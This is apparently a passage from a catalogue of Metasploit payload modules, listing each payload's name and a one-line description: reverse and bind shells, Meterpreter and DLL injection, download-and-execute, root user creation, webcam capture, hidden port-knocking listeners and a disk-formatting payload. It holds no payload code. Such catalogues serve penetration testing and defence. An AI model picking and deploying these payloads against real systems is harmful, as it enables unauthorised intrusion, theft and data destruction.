java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/armle/adduser Create a new user with UID 0
linux/armle/exec Execute an arbitrary command
linux/armle/shell/bind_tcp dup2 socket in r12, then execve. Listen for a connection
linux/armle/shell/reverse_tcp dup2 socket in r12, then execve. Connect back to the attacker
linux/armle/shell_bind_tcp Connect to target and spawn a command shell
linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsbe/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes.
linux/mipsbe/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes or executing other payloads that rely on initial startup procedures.
linux/mipsbe/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/mipsbe/shell_bind_tcp Listen for a connection and spawn a command shell
linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/mipsle/exec A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.
linux/mipsle/reboot A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes.
linux/mipsle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/mipsle/shell_bind_tcp Listen for a connection and spawn a command shell
linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc/shell_find_port Spawn a shell on an established connection
linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/ppc64/shell_find_port Spawn a shell on an established connection
linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x64/exec Execute an arbitrary command
linux/x64/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
linux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x64/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: ‘nmap -sS target -p-’.
linux/x64/shell_find_port Spawn a shell on an established connection
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/adduser Create a new user with UID 0
linux/x86/chmod Runs chmod on specified file with specified mode
linux/x86/exec Execute an arbitrary command
linux/x86/meterpreter/bind_ipv6_tcp Inject the meterpreter server payload (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp Inject the meterpreter server payload (staged). Listen for a connection
linux/x86/meterpreter/bind_tcp Inject the meterpreter server payload (staged). Listen for a connection (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid Inject the meterpreter server payload (staged). Listen for a connection with UUID Support (Linux x86)
linux/x86/meterpreter/find_tag Inject the meterpreter server payload (staged). Use an established connection
linux/x86/meterpreter/reverse_ipv6_tcp Inject the meterpreter server payload (staged). Connect back to attacker over IPv6
linux/x86/meterpreter/reverse_nonx_tcp Inject the meterpreter server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp Inject the meterpreter server payload (staged). Connect back to the attacker
linux/x86/meterpreter/reverse_tcp_uuid Inject the meterpreter server payload (staged). Connect back to the attacker
linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
linux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection
linux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)
linux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)
linux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection
linux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6
linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: ‘nmap -sS target -p-’.
linux/x86/shell_find_port Spawn a shell on an established connection
linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/x86/shell_reverse_tcp2 Connect back to attacker and spawn a command shell
mainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implmentation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically.
netware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker
nodejs/shell_bind_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL
osx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell
osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.
osx/ppc/shell/bind_tcp Spawn a command shell (staged). Listen for a connection
osx/ppc/shell/find_tag Spawn a command shell (staged). Use an established connection
osx/ppc/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
osx/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
osx/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute
osx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, execute
osx/x64/exec Execute an arbitrary command
osx/x64/say Say an arbitrary string outloud using Mac OS X text2speech
osx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/bundleinject/bind_tcp Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute
osx/x86/bundleinject/reverse_tcp Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute
osx/x86/exec Execute an arbitrary command
osx/x86/isight/bind_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute
osx/x86/isight/reverse_tcp Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute
osx/x86/shell_bind_tcp Listen for a connection and spawn a command shell
osx/x86/shell_find_port Spawn a shell on an established connection
osx/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
osx/x86/vforkshell/bind_tcp Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute
osx/x86/vforkshell/reverse_tcp Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute
osx/x86/vforkshell_bind_tcp Listen for a connection, vfork if necessary, and spawn a command shell
osx/x86/vforkshell_reverse_tcp Connect back to attacker, vfork if necessary, and spawn a command shell
php/bind_perl Listen for a connection and spawn a command shell via perl (persistent)
php/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) over IPv6
php/bind_php Listen for a connection and spawn a command shell via php
php/bind_php_ipv6 Listen for a connection and spawn a command shell via php (IPv6)
php/download_exec Download an EXE from an HTTP URL and execute it
php/exec Execute a single system command
php/meterpreter/bind_tcp Run a meterpreter server in PHP. Listen for a connection
php/meterpreter/bind_tcp_ipv6 Run a meterpreter server in PHP. Listen for a connection over IPv6
php/meterpreter/bind_tcp_ipv6_uuid Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support
php/meterpreter/bind_tcp_uuid Run a meterpreter server in PHP. Listen for a connection with UUID Support
php/meterpreter/reverse_tcp Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter/reverse_tcp_uuid Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
php/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter server (PHP)
php/reverse_perl Creates an interactive shell via perl
php/reverse_php Reverse PHP connect back shell with checks for disabled functions
php/shell_findsock Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.
python/meterpreter/bind_tcp Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Listen for a connection
python/meterpreter/bind_tcp_uuid Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Listen for a connection with UUID Support
python/meterpreter/reverse_http Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Tunnel communication over HTTP
python/meterpreter/reverse_https Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Tunnel communication over HTTP using SSL
python/meterpreter/reverse_tcp Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Connect back to the attacker
python/meterpreter/reverse_tcp_uuid Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5). Connect back to the attacker with UUID Support
python/meterpreter_bind_tcp Connect to the victim and spawn a Meterpreter shell
python/meterpreter_reverse_http Connect back to the attacker and spawn a Meterpreter shell
python/meterpreter_reverse_https Connect back to the attacker and spawn a Meterpreter shell
python/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
python/shell_reverse_tcp Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3
python/shell_reverse_tcp_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
ruby/shell_bind_tcp Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_bind_tcp_ipv6 Continually listen for a connection and spawn a command shell via Ruby
ruby/shell_reverse_tcp Connect back and create a command shell via Ruby
ruby/shell_reverse_tcp_ssl Connect back and create a command shell via Ruby, uses SSL
solaris/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/sparc/shell_find_port Spawn a shell on an established connection
solaris/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
solaris/x86/shell_bind_tcp Listen for a connection and spawn a command shell
solaris/x86/shell_find_port Spawn a shell on an established connection
solaris/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
tty/unix/interact Interacts with a TTY on an established socket connection
windows/adduser Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)
windows/dllinject/bind_hidden_ipknock_tcp Inject a DLL via a reflective loader. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection
windows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)
windows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection
windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)
windows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP
windows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6
windows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)
windows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker
windows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support
windows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)
windows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload
windows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it
windows/exec Execute an arbitrary command
windows/format_all_drives This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.
windows/loadlibrary Load an arbitrary library path
windows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon
windows/meterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/meterpreter/bind_hidden_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection (Windows x86)
windows/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/meterpreter/bind_nonx_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (No NX)
windows/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)
windows/meterpreter/bind_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection
windows/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection with UUID Support (Windows x86)
windows/meterpreter/find_tag Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Use an established connection
windows/meterpreter/reverse_hop_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows wininet)
windows/meterpreter/reverse_http_proxy_pstore Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP
windows/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows wininet)
windows/meterpreter/reverse_https_proxy Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP using SSL with custom proxy support
windows/meterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker over IPv6
windows/meterpreter/reverse_nonx_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker (No NX)
windows/meterpreter/reverse_ord_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_allports Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/meterpreter/reverse_tcp_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support
windows/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows winhttp)
windows/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows winhttp)
windows/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell
windows/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
windows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
windows/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell
windows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
windows/patchupdllinject/bind_hidden_ipknock_tcp Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/patchupdllinject/bind_hidden_tcp Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/patchupdllinject/bind_ipv6_tcp Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)
windows/patchupdllinject/bind_ipv6_tcp_uuid Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/patchupdllinject/bind_nonx_tcp Inject a custom DLL into the exploited process. Listen for a connection (No NX)
windows/patchupdllinject/bind_tcp Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)
windows/patchupdllinject/bind_tcp_rc4 Inject a custom DLL into the exploited process. Listen for a connection
windows/patchupdllinject/bind_tcp_uuid Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)
windows/patchupdllinject/find_tag Inject a custom DLL into the exploited process. Use an established connection
windows/patchupdllinject/reverse_ipv6_tcp Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6
windows/patchupdllinject/reverse_nonx_tcp Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)
windows/patchupdllinject/reverse_ord_tcp Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_allports Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/patchupdllinject/reverse_tcp_dns Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_rc4 Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_rc4_dns Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_uuid Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support
windows/patchupmeterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/patchupmeterpreter/bind_hidden_tcp Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/patchupmeterpreter/bind_ipv6_tcp Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)
windows/patchupmeterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/patchupmeterpreter/bind_nonx_tcp Inject the meterpreter server DLL (staged). Listen for a connection (No NX)
windows/patchupmeterpreter/bind_tcp Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)
windows/patchupmeterpreter/bind_tcp_rc4 Inject the meterpreter server DLL (staged). Listen for a connection
windows/patchupmeterpreter/bind_tcp_uuid Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)
windows/patchupmeterpreter/find_tag Inject the meterpreter server DLL (staged). Use an established connection
windows/patchupmeterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6
windows/patchupmeterpreter/reverse_nonx_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)
windows/patchupmeterpreter/reverse_ord_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support
windows/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session
windows/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session
windows/shell/bind_hidden_ipknock_tcp Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/shell/bind_hidden_tcp Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/shell/bind_ipv6_tcp Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)
windows/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/shell/bind_nonx_tcp Spawn a piped command shell (staged). Listen for a connection (No NX)
windows/shell/bind_tcp Spawn a piped command shell (staged). Listen for a connection (Windows x86)
windows/shell/bind_tcp_rc4 Spawn a piped command shell (staged). Listen for a connection
windows/shell/bind_tcp_uuid Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)
windows/shell/find_tag Spawn a piped command shell (staged). Use an established connection
windows/shell/reverse_ipv6_tcp Spawn a piped command shell (staged). Connect back to the attacker over IPv6
windows/shell/reverse_nonx_tcp Spawn a piped command shell (staged). Connect back to the attacker (No NX)
windows/shell/reverse_ord_tcp Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_allports Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/shell/reverse_tcp_dns Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_rc4 Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_rc4_dns Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_uuid Spawn a piped command shell (staged). Connect back to the attacker with UUID Support
windows/shell_bind_tcp Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell
windows/shell_hidden_bind_tcp Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not comming from the IP defined in AHOST. This way the port will appear as “closed” helping us to hide the shellcode.
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
windows/speak_pwned Causes the target to say “You Got Pwned” via the Windows Speech API
windows/upexec/bind_hidden_ipknock_tcp Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/upexec/bind_hidden_tcp Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/upexec/bind_ipv6_tcp Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)
windows/upexec/bind_ipv6_tcp_uuid Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/upexec/bind_nonx_tcp Uploads an executable and runs it (staged). Listen for a connection (No NX)
windows/upexec/bind_tcp Uploads an executable and runs it (staged). Listen for a connection (Windows x86)
windows/upexec/bind_tcp_rc4 Uploads an executable and runs it (staged). Listen for a connection
windows/upexec/bind_tcp_uuid Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)
windows/upexec/find_tag Uploads an executable and runs it (staged). Use an established connection
windows/upexec/reverse_ipv6_tcp Uploads an executable and runs it (staged). Connect back to the attacker over IPv6
windows/upexec/reverse_nonx_tcp Uploads an executable and runs it (staged). Connect back to the attacker (No NX)
windows/upexec/reverse_ord_tcp Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_allports Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/upexec/reverse_tcp_dns Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_rc4 Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_rc4_dns Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_uuid Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support
windows/vncinject/bind_hidden_ipknock_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/vncinject/bind_hidden_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)
windows/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/vncinject/bind_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)
windows/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)
windows/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Listen for a connection
windows/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)
windows/vncinject/find_tag Inject a VNC Dll via a reflective loader (staged). Use an established connection
windows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/vncinject/reverse_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)
windows/vncinject/reverse_http_proxy_pstore Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP
windows/vncinject/reverse_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6
windows/vncinject/reverse_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)
windows/vncinject/reverse_ord_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_allports Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/vncinject/reverse_tcp_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_rc4_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support
windows/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)
windows/x64/exec Execute an arbitrary command (Windows x64)
windows/x64/loadlibrary Load an arbitrary x64 library path
